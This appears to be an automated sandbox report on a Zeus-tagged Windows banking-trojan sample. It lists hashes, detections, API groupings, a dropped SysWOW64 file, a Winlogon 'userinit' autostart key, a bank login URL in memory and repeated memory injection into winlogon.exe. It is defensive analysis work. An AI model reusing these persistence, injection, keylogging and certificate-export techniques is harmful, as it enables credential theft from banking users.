
Analysis Report Ue0N2amgcH

Overview

General Information

Sample Name: Ue0N2amgcH (renamed file extension from none to exe)
Analysis ID: 381781
MD5: ccb2db4a8a284f62db7002be470ac542
SHA1: b2bdb5ed1ff743117cdf8500a498e247febbb6ec
SHA256: 4fb04b099a37aeae2f58685b8fb08bca298f8f68d5dfc45ceb9fa398e9f109ea
Tags: zeus1

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Startup

  • System is w10x64
  • Ue0N2amgcH.exe (PID: 6080 cmdline: 'C:\Users\user\Desktop\Ue0N2amgcH.exe' MD5: CCB2DB4A8A284F62DB7002BE470AC542)
    • winlogon.exe (PID: 560 cmdline: MD5: F9017F2DC455AD373DF036F5817A8870)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\winlogon.exe, NewProcessName: C:\Windows\System32\winlogon.exe, OriginalFileName: C:\Windows\System32\winlogon.exe, ParentCommandLine: 'C:\Users\user\Desktop\Ue0N2amgcH.exe' , ParentImage: C:\Users\user\Desktop\Ue0N2amgcH.exe, ParentProcessId: 6080, ProcessCommandLine: , ProcessId: 560

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Ue0N2amgcH.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Windows\SysWOW64\sdra64.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Multi AV Scanner detection for submitted file
Source: Ue0N2amgcH.exe | Virustotal: Detection: 90%
Source: Ue0N2amgcH.exe | ReversingLabs: Detection: 100%
Machine Learning detection for dropped file
Source: C:\Windows\SysWOW64\sdra64.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Ue0N2amgcH.exe | Joe Sandbox ML: detected
Source: 0.1.Ue0N2amgcH.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen3
Source: 0.0.Ue0N2amgcH.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040DE73 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
Source: Ue0N2amgcH.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040A077 PathCombineW,FindFirstFileW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00411039 FindFirstFileW,FindClose,FindFirstFileW,FindClose,CreateMutexW,MoveFileExW
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040F89A PathCombineW,FindFirstFileW,PathCombineW,PathCombineW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_004040B8 PathCombineW,FindFirstFileW,PathCombineW,WaitForSingleObject,RtlEnterCriticalSection,PathMatchSpecW,PathCombineW,wnsprintfW,WaitForSingleObject,RtlLeaveCriticalSection,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00406EBD ExpandEnvironmentStringsW,FindFirstFileW,PathRemoveFileSpecW,PathCombineW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040B44D RtlAllocateHeap,CreateEventW,InternetQueryOptionA,InternetSetStatusCallback,InternetSetOptionA,InternetReadFileExA,GetLastError,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,ResetEvent,InternetSetOptionA,InternetSetStatusCallback,CloseHandle,InternetQueryOptionA,InternetCrackUrlA,GetSystemTime,wnsprintfW,GetSystemTime,InternetQueryOptionA,GetUrlCacheEntryInfoW,RtlEnterCriticalSection,RtlLeaveCriticalSection
Source: Ue0N2amgcH.exe, 00000000.00000002.464238365.00000000023F3000.00000004.00000040.sdmp | String found in binary or memory: https://onlineeast#.bankofamerica.com/cgi-bin/ias/
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040554F GetClipboardData,GlobalFix,GlobalUnWire
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_004056B3 GetTickCount,GetCurrentProcessId,wnsprintfW,GetKeyState,GetKeyState,GetKeyboardState,ToUnicode,WideCharToMultiByte
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00406C0D NtQueryInformationProcess,CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,NtCreateThread
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040528A NtQueryDirectoryFile,NtQueryObject,lstrcmpiW
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00409697 CreateFileW,NtQueryObject,lstrcpyW,CloseHandle
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00409CF9 GetProcAddress,LoadLibraryA,GetProcAddress,FreeLibrary,GetForegroundWindow,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateTokenEx,LoadLibraryA,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CreateProcessW,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040A16B ExitWindowsEx
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | File created: C:\Windows\SysWOW64\sdra64.exe
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00412014
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040DFED
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040DD80
Source: Ue0N2amgcH.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sdra64.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.evad.winEXE@1/2@0/0
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00403DAD CertOpenSystemStoreW,PFXExportCertStore,PFXExportCertStore,GetSystemTime,wnsprintfW,CertDuplicateCertificateContext,CertDeleteCRLFromStore,CertEnumCertificatesInStore,CertCloseStore
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040F0FC OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00405808 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,Process32NextW,FindCloseChangeNotification
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Mutant created: \Sessions\1\BaseNamedObjects\_AVIRA_21099
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | File read: C:\Users\user\Desktop\Ue0N2amgcH.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Unpacked PE file: 0.2.Ue0N2amgcH.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;.data:W;.reloc:R;.data1:W;
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_004093CD LoadLibraryA,GetProcAddress
Source: initial sample | Static PE information: section name: .text entropy: 7.30372755134
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | File created: C:\Windows\SysWOW64\sdra64.exe

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon userinit
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00407D61 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadCursorW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Dropped PE file which has not been started: C:\Windows\SysWOW64\sdra64.exe
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe TID: 4168 | Thread sleep count: 193 > 30
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00405171 LdrGetProcedureAddress
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00409475 HeapCreate,GetProcessHeap,RtlAllocateHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC32000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC52000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC72000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC92000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CC96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD12000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD32000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD52000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD72000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD92000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CD96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE00000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE01000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE12000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE14000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE16000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE20000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE21000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE32000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE34000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE36000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE40000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE41000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE52000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE54000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE56000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE60000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE61000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE72000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE74000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE76000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE80000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE81000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE92000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE94000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CE96000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page no accessJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB2000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB4000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory allocated: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page read and writeJump to behavior
